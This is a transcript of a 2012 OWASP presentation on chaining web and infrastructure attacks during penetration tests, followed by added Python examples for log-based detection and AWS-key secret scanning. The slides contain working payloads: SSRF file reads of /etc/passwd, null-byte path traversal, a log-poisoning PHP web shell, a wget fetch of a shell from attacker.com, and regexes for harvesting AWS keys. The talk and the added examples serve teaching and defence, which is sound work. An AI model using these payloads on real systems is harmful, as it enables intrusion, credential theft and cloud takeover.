Attack Chaining: Advanced Maneuvers for Hack Fu
 


Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

    Attack Chaining: Advanced Maneuvers for Hack Fu (Presentation Transcript)

    • Attack Chaining: Advanced Maneuvers for Hack Fu. OWASP ATL, 31 May 2012
    • About Us. Who are these dudes? Rob, Sr. Security Associate @ Stach & Liu; Oscar, Security Associate @ Stach & Liu
    • Penetration Test vs. Vulnerability Assessment
    • Simulate a real world attack against a target network or application. - EVERYBODY
    • It answers the question, “could someone break in?”
    • Penetration Testing: 1. Information Gathering; 2. Exploit & Penetrate; 3. Escalate Privileges; 4a. Maintain Access; 4b. Deny Access
    • Pen Testing Scenario: • Web application penetration test • Cloud-based infrastructure hosts multiple sites • Out-sourced PHP development to many contractors • Determine attacker's ability to compromise PII or infrastructure
    • Step 1 – Explore
    • Step 2 – Read Code. http://vuln.com/dir/share.js ... AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
    • Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
    • Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
    • Attack Chaining – Maneuver 1
    • Step 5 – Gather More Info. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
    • Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
      <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
      </VirtualHost>
    • Step 7 – Back to DirBuster
    • Step 8 – Review Code. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
      <?php
      require_once('includes/config.php');
      $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
      $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
      $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
      include($currentModuleFile);   // path built from request input: local file include
      exit;
      ?>
    • Attack Chaining – Maneuver 2
    • Step 9 – Null Byte Injection. http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
    • Step 8 – Review Code (again). http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
      <?php
      require_once('includes/config.php');
      $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
      $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
      $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';   // %00 in $module truncates the '/' . $action . '.php' suffix
      include($currentModuleFile);
      exit;
      ?>
    • Step 10 – Review Gathered Info. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
    • Step 10 – Back to Virtual Conf. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
      <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
      </VirtualHost>
    • Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
    • Step 12 – Poison Logs
      <? echo "<pre>"; passthru($_GET['cmd']); echo "</pre>"; ?>
    • Step 13 – PHP in the Log. http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo "<pre>";passthru($_GET['cmd']);echo "</pre>"; ?>
    • Step 14 – Execute Code. http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
      /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
    • Step 14 – Execute Code. The included log line now runs as:
      <? echo "<pre>"; passthru('ls'); echo "</pre>"; ?>
      /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
    • Attack Chaining – Maneuver 3
    • Step 15 – Upload Shell. http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
    • Step 16 – Enjoy!
    • Step 17 – I want more! Regexes used to hunt for AWS keys, one per line:
      ec2[^d]["][A-Z0-9]{20}["]
      ec2.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
      ec2.*["][A-Z0-9]{20}["]
      ec2(D)*["][A-Z0-9]{20}["]
      amazon.*["][A-Z0-9]{20}["]
      (amazon|ec2).*["][A-Z0-9]{20}["]
      amazon(D)*["][A-Z0-9]{20}["]
      access secret ["][A-Z0-9]{20}["] [A-Za-z0-9+/]{40}
      amazon.*["][A-Z0-9]{20}["].*["][A-Za-z0-9+/]{40}["]
      aws.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
      amazon.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]
      secret.*["][A-Za-z0-9+/]{40}["]
      ["][A-Za-z0-9+/]{40}["].*amazon
    • Step 18 – Amazon AWS Regex. Hits in the source:
      $this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628', ...
      $aws_key = '8AFB5AF55D1E6620EE1';
      define('AMAZON_KEY', '372B8E408D1484C538F');
      if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
      //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
      define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
    • Step 19 – AWS Takeover
    • Step 20 – Make It Your Own
    • Cost of Amazon Cloud Compromise. CRITICAL EXPOSURE: 1. Found 8 Amazon Secret Keys to access Amazon S3. 2. Found that 2 of the 8 have administrator access to Amazon EC2. 3. Attacker launches 100 Extra Large Clusters: $1,049,000
    • Take Them Off The Web. CRITICAL EXPOSURE: 1. Found 8 Amazon Secret Keys to access Amazon S3. 2. Found that 2 of the 8 have administrator access to Amazon EC2. 3. Attacker shuts down and deletes all servers and backups permanently: PRICELESS
    • Attack Chaining – Hack Fu
    • Why Is This Happening? 1. Local File Include (• File Read Only • Code Execution) 2. Null Byte Injection 3. Log Poisoning 4. Insecure Credential Storage 5. Overly Permissive Amazon AWS Keys 6. Sensitive Information Disclosure
    • Web → Mass Malware Deployment
    • Web → Data Center Compromise
    • Web → Internal Network Compromise
    • Internal Assessment → SSN & Bank #'s
    • Infrastructure Review
    • Step 1 – Target Wireless
    • Step 2 – Port Scan
    • Step 3 – Test Default Creds
    • Infrastructure Apocalypse
    • Step 4 – Control AP
    • Step 5 – Read All E-mail
    • Step 6 – Listen To VOIP
    • Step 7 – Open All Doors
    • Step 7 – Server Room Door
    • Is This Real Life? 1. Insecure Wireless Encryption 2. Improper Network Segmentation 3. Insecure Default Configuration 4. Weak Passwords 5. Sensitive Information Disclosure
    • Protection – How? 1. People 2. Policy 3. Processes 4. Strategic / Tactical Security 5. Defense In-Depth
    • Defense In-Depth is protection against...
    • How Do You Get Better?
    • Synthesis and Patterns: can be both good and bad
    • Attack Visualization: like Bobby Fischer
    • Thank You
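Added example, not from the deck: detection logic for the web chain in Steps 3 through 13, run over constructed Apache access-log lines (the field layout and the sample lines are assumptions, modelled on the URLs and the error_log entry the slides show). It flags s_proxy.php fetching a file:// URL, a traversal or null byte in controller.php's module parameter, and PHP tags in the Referer or User-Agent that would be written into error_log; it is in Python rather than PHP because it runs beside the web server, not in the application.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic) modelled on the chain in the
# slides; the last line is benign traffic that must not be flagged.
SAMPLE_LOG = """\
10.10.65.18 - - [31/May/2012:10:01:02 +0000] "GET /dir/include/s_proxy.php?redirect_url=http://www.google.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:01:09 +0000] "GET /dir/include/s_proxy.php?redirect_url=file:///etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:02:15 +0000] "GET /dir/include/controller.php?module=../../../../../../etc/passwd%00 HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:03:40 +0000] "GET /wp-content/themes/lulzcat-attack.jpg HTTP/1.1" 404 209 "<? echo <pre>;passthru($_GET[cmd]);echo </pre>; ?>" "Mozilla/5.0"
192.0.2.7 - - [31/May/2012:10:04:01 +0000] "GET /dir/index.php?module=news&action=list HTTP/1.1" 200 3020 "http://www.vuln.com/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method uri proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# PHP that an attacker wants the server to log; Referer and User-Agent are both
# client-controlled and both end up in error_log entries.
PHP_TAG = re.compile(r'<\?|passthru\s*\(|system\s*\(|\$_(GET|POST|REQUEST)', re.I)
RULES = [
    # (rule name, log field, pattern applied after one round of URL-decoding)
    ("ssrf-local-file-read", "uri", re.compile(r'redirect_url=file:', re.I)),
    ("lfi-traversal-or-nullbyte", "uri", re.compile(r'\.\./|\x00')),
    ("log-poisoning-php-in-referer", "referer", PHP_TAG),
    ("log-poisoning-php-in-ua", "ua", PHP_TAG),
]

def detect(log_text):
    """Return (client ip, rule name, offending field value) for each hit."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        fields = m.groupdict()
        for name, field, pattern in RULES:
            if pattern.search(unquote(fields[field])):
                findings.append((fields["ip"], name, fields[field]))
    return findings

if __name__ == "__main__":
    for ip, rule, value in detect(SAMPLE_LOG):
        print(f"{ip}  {rule}  {value[:70]}")
```

Only one round of URL-decoding is applied, so double-encoded traversal (%252e%252e) needs a second pass before these rules see it.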
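Added example, not from the deck, for Steps 17 and 18 and the "Insecure Credential Storage" finding: a pre-commit secret scan that applies the same key shapes the deck's regexes look for (a quoted 20-character [A-Z0-9] access key ID and a quoted 40-character secret, near an aws/amazon/ec2/secret keyword) to constructed PHP source. The credential values are the AWS documentation example pair, and the getenv() line shows the form that passes the scan.

```python
import re

# Constructed PHP snippet shaped like the Step 18 hits (values are the AWS
# documentation example key pair, not real credentials).
SAMPLE_SOURCE = """\
<?php
$aws_key = 'AKIAIOSFODNN7EXAMPLE';
define('AMAZON_SECRET', 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY');
$this->amazonService = new Zend_Service_Amazon(getenv('AWS_ACCESS_KEY_ID'), getenv('AWS_SECRET_ACCESS_KEY'));
$title = 'Amazon rainforest documentary';
"""

# Keyword (case-insensitive), then a quoted literal of the right alphabet and
# exact length on the same line. The scoped (?i:...) flag keeps the literal's
# character class case-sensitive, unlike the deck's all-uppercase patterns.
ACCESS_KEY_RE = re.compile(r'(?i:aws|amazon|ec2).*?["\'](?P<v>[A-Z0-9]{20})["\']')
SECRET_RE = re.compile(r'(?i:secret|aws|amazon).*?["\'](?P<v>[A-Za-z0-9+/]{40})["\']')
CHECKS = (("aws-access-key-id", ACCESS_KEY_RE), ("aws-secret-access-key", SECRET_RE))

def redact(value):
    """Keep a 4-character prefix so a hit can be traced without re-leaking it."""
    return value[:4] + "*" * (len(value) - 4)

def scan(source, path="sample.php"):
    """Return (path, line number, finding type, redacted literal) per hit."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for kind, pattern in CHECKS:
            m = pattern.search(line)
            if m:
                findings.append((path, lineno, kind, redact(m.group("v"))))
    return findings

if __name__ == "__main__":
    for path, lineno, kind, value in scan(SAMPLE_SOURCE):
        print(f"{path}:{lineno}: {kind} {value}")
```

Wire scan() into a pre-commit hook or CI step over every changed file; a hit should block the commit until the literal is replaced by an environment variable or secret store lookup like the getenv() line.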